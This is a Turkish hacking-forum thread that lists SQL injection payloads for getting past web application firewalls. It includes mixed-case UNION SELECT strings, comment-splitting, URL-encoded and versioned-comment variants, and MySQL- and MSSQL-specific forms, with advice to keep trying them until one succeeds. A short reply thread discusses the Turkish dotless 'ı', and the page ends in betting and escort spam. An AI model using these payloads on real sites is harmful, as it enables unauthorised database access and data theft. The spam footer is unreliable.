Konu Bilgileri
Konu: WAF Injection - WAF Bypass Yazar: Risk-Master
Okunma: 1824 Yorum: 2
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
WAF ((W)eb (A)pplication (F)irewall) Injection

[Resim: vJB6Y6.png]

SQL Injection yaptığımız zaman genellikle kolon sayılarını, tablo isimlerini, versiyon numarasını, database ismini vb. gibi bilgileri ekrana yansıtamayız. İşte bunun sebebi Firewall yani Güvenlik Duvarının engellemesinden kaynaklıdır. İşte bu yüzden komutlarımızı büyük-küçük veya kimi zaman bazı işaretler bırakarak Güvenlik Duvarını (Firewall) korumasını atlamaya yani bu savunmayı geçmeye çalışırız. İşte bu aşağıdaki komutlar Güvenlik Duvarını (Firewall)'i geçmemiz için çeşitli komutlardır. Tüm komutlar aynı işlevi görmektedir.

Örneğin: union+select ile (UnIoN)+(SelECT) komutları aynı işlevi görmektedir.

Peki şöyle sorabilirsiniz:  "Aynı işlevi görüyor ise neden o zaman iki komutu paylaşıyorsun?" diye sorabilirsiniz.

Güvenlik Duvarını (Firewall)'i geçmek için bu komutları büyük-küçük, kimi zaman parantez içine kimi zaman da özel işaretler kullanırız ve Güvenlik Duvarını yani Firewall-i geçmiş oluruz. Bunun sonucunda da kolon sayısını, tablo isimlerini, versiyon numarasını veya ki database ismini ekrana yansıtabiliriz. 

Bu veya birçok Firewall Bypass Etme Yöntemleri vardır. Bu yöntemler ile de Güvenlik Duvarını yani Firewall-i geçebilirsiniz.

Not: Güvenlik Duvarını (Firewall)'i geçmek için çeşitli yöntemler vardır. Birinci komut işinizi görmeyebilir. Diğer komutları denersiniz elbette ki sonucunda bir komutla Güvenlik Duvarını (Firewall)'i atlatacaksınız ve bu yöntem sayesinde ekrana yansıtmak istediğiniz bilgilere ulaşabilirsiniz.

Bu durum genellikle: Not Found, Not Found 404, Not Found 406, Not Found Mod Security vs. gibi durumları aşmak içindir.

Atlayarak Bypass Yöntemleri;

1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+’UnI”On’+’SeL”ECT’
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3–
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table–
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3–

union+select seçerek Bypass Atlamak;

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
Ara
Cevapla
#2
Büyük harf küçük harfe dikkat edicek miyiz üstad mesela

id=1+(UnIoN)+(SelECT)+ bunu
id=1+(unıon)+(select)+ yapsam sorun olur mu
Cevapla
#3
(22.09.2014, Saat:19:13)atawho Adlı Kullanıcıdan Alıntı: Büyük harf küçük harfe dikkat edicek miyiz üstad mesela

id=1+(UnIoN)+(SelECT)+ bunu
id=1+(unıon)+(select)+ yapsam sorun olur mu

Olmaz "unıon" daki "ı" harfi "ı" değil "i" harfi olmalı.
Diyelim ki "i" harfini büyük yazmak istedin o zaman büyük "I" şeklinde yazmalısın.

Çünkü İngilizce Alfabesinde "ı" harfi yoktur. "i" harfi vardır. Eğer ki büyük "i" harfi yazmak istersen, bu bizim Türkçe Alfabesinde büyük "I" olarak geçiyor.
Ara
Cevapla


WAF Injection - WAF Bypass Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Java ile Server Bypass ( Priv Method) z3r0fy 16 7,281 05.05.2022, Saat:10:03
Son Yorum: juliay
  Priv8 CageFS Bypass Kzsg 42 15,951 06.03.2022, Saat:02:25
Son Yorum: ByLorex
  new bypass for Lite SPeed Server G3nzo 38 13,663 06.03.2022, Saat:02:23
Son Yorum: ByLorex
  Litespeed Server Bypass S3CH4TZ 13 7,449 06.03.2022, Saat:02:20
Son Yorum: ByLorex
  python ile cloudflare ip bypass nasıl yapılır gösterdim pythoncu 0 2,808 27.07.2021, Saat:17:14
Son Yorum: pythoncu


tipobet canlı bahis siteleri bonus veren siteler canlı bahis bahis siteleri deneme bonusu veren siteler deneme bonusu bahis siteleri casino siteleri bahis siteleri deneme bonusu bodrum escort kuşadası escort konya escort konya escort bodrum escort